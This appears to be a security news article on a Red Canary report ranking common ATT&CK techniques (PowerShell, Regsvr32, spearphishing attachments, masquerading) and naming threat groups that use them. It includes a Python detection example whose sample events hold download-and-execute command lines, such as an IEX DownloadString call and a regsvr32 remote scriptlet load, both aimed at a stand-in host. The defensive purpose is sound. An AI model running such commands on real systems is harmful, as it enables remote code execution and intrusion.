Attackers can use PowerShell to direct the execution of a local script, retrieve and execute remote resources using various network protocols, encode payloads passed via the command line, or load PowerShell into other processes.
Adversaries known to leverage the technique in their attacks include Turla, which uses a post-infection executable to load malicious PowerShell scripts directly into memory. The Cobalt hackers too are known for the use of multiple instances of PowerShell in the later stages of their attacks.
A look at the top ten ATT&CK techniques by industry shows that PowerShell has been used in attacks across 15 verticals, including communication, education, energy, financial, government, health, and media industries. In all cases, it is either the most common or among the top three most commonly used techniques.
“PowerShell is here to stay for administrators and adversaries alike, and those organizations that learn to defend against malicious uses of it will have a distinct advantage. Defending against PowerShell will require not just baselining and an understanding of changes in the ways adversaries use the tool, but defenders will also have to maintain intelligence related to a wide and changing variety of PowerShell attack tools,” Red Canary says.
Breakthroughs in methods for escaping script-host constraints on Windows and macOS, the report reveals, have created new opportunities for actors looking to leverage scripting as part of their malicious attacks. In addition to WScript and CScript, the default scripting binaries on Windows systems, other applications, including SXSL and WMIC, can also execute scripts, which expands the attack surface.
The Chinese cyber-espionage group known as APT1 is known for the use of batch scripts in the early reconnaissance phase of its attacks, to gather system information, enumerate running services and processes, list accounts with administrative privileges, and gather other data. The Smoke Loader Trojan uses a Visual Basic script to ensure persistence.
Regsvr32.exe, a trusted component of the Windows platform, provides attackers with the means to execute native code or scripts, either by leveraging local resources or by loading them from a remote location. The state-sponsored espionage group Ocean Lotus and the espionage group APT19 are known for the use of regsvr32 in their attacks.
Connection proxies, which direct network traffic between systems or act as intermediaries for network communications, are used to obscure the identity or location of adversaries. Prominent examples of threat actors leveraging the technique include Duqu and APT10, both focused on espionage attacks.
Spearphishing attachment, the form of spearphishing that employs malware attached to an email, is a simple and effective technique that attackers can leverage for code execution. It allows for the use of multiple file types, thus providing the attackers with the flexibility of targeting the various applications that handle specific document types.
With virtually everyone having at least an email address, phishing provides attackers with a nearly unlimited array of potential targets. The technique relies on the victim’s trust to achieve its malicious intent, although numerous tools are also available to prevent malicious attachments from reaching the victim’s inbox.
The technique, Red Canary points out, has been a particularly prolific tool among governments seeking to surveil supposed dissidents, as exemplified in Citizen Lab’s report last year on the targeting of Tibetan activists. The Leviathan (TEMP.Periscope) group has engaged in numerous attacks targeting defense contractors, universities with military research ties, law firms, and government agencies.
The Carbanak group too is believed to have leveraged spearphishing attachments as the initial infection vector in some of its attacks.
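The PowerShell, Regsvr32 and spearphishing-attachment behaviours described above can be surfaced from ordinary process-creation telemetry. The following is an added example, not code from the Red Canary report: it assumes Sysmon-like events with constructed `image`, `parent` and `cmdline` fields, decodes any `-EncodedCommand` payload for inspection, and emits hypothetical finding tags (`ps_encoded_command`, `ps_remote_retrieval`, `ps_spawned_by_office`, `regsvr32_remote_script`) that a detection pipeline could route.

```python
import base64
import re

# Constructed process-creation events in a Sysmon-like shape (not real telemetry).
ENCODED_DEMO = base64.b64encode("Get-Process | Out-Null".encode("utf-16le")).decode()
SAMPLE_EVENTS = [
    {"image": "powershell.exe", "parent": "explorer.exe",
     "cmdline": r"powershell.exe -ExecutionPolicy Bypass -File C:\Scripts\backup.ps1"},
    {"image": "powershell.exe", "parent": "WINWORD.EXE",
     "cmdline": "powershell.exe -NoP -W Hidden -enc " + ENCODED_DEMO},
    {"image": "powershell.exe", "parent": "cmd.exe",
     "cmdline": "powershell.exe -c \"IEX (New-Object Net.WebClient)"
                ".DownloadString('http://example.invalid/a.ps1')\""},
    {"image": "regsvr32.exe", "parent": "cmd.exe",
     "cmdline": "regsvr32.exe /s /n /u /i:http://example.invalid/s.sct scrobj.dll"},
]

# powershell.exe accepts unambiguous prefixes of -EncodedCommand (-e, -ec, -enc).
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)")
# Cmdlets, .NET types and URL schemes that fetch or evaluate remote content.
REMOTE = re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|\biwr\b"
                    r"|net\.webclient|invoke-expression|\biex\b|https?://")
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}


def decode_encoded_command(cmdline):
    """Decoded -EncodedCommand text (PowerShell base64-encodes UTF-16LE),
    "<undecodable>" for a malformed blob, or None when the flag is absent."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return "<undecodable>"


def triage(event):
    """Return finding tags for one event; an empty list means nothing matched."""
    findings = []
    image, parent, cmd = event["image"].lower(), event["parent"].lower(), event["cmdline"]
    if image == "powershell.exe":
        decoded = decode_encoded_command(cmd)
        if decoded is not None:
            findings.append("ps_encoded_command")
        # Inspect the decoded script too: encoding hides keywords from plain matches.
        if REMOTE.search(cmd) or (decoded and REMOTE.search(decoded)):
            findings.append("ps_remote_retrieval")
        if parent in OFFICE_PARENTS:  # script host spawned by a document handler
            findings.append("ps_spawned_by_office")
    elif image == "regsvr32.exe" and re.search(r"(?i)/i:https?://", cmd):
        findings.append("regsvr32_remote_script")
    return findings
```

Running `triage` over each of `SAMPLE_EVENTS` leaves the scripted backup untagged and tags the other three events, which is the baselining step the report calls for: known-good administrative usage is separated from the encoded, remote-fetching and document-spawned cases.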
Masquerading, another prevalent MITRE ATT&CK technique, relies on manipulating the name or location of an executable to evade defensive technology or deceive potential victims. The $80 million heist from Bangladesh Bank leveraged the technique, as did the Calisto macOS Trojan that remained hidden for two years.
Credential Dumping, Registry Run Keys / Start Folder, Rundll32, and Service Execution rounded out the top 10 techniques, Red Canary says. All of these techniques, and dozens of others used less often, are here to stay, and they are also expected to evolve as attackers become more creative and discover new ways to leverage them.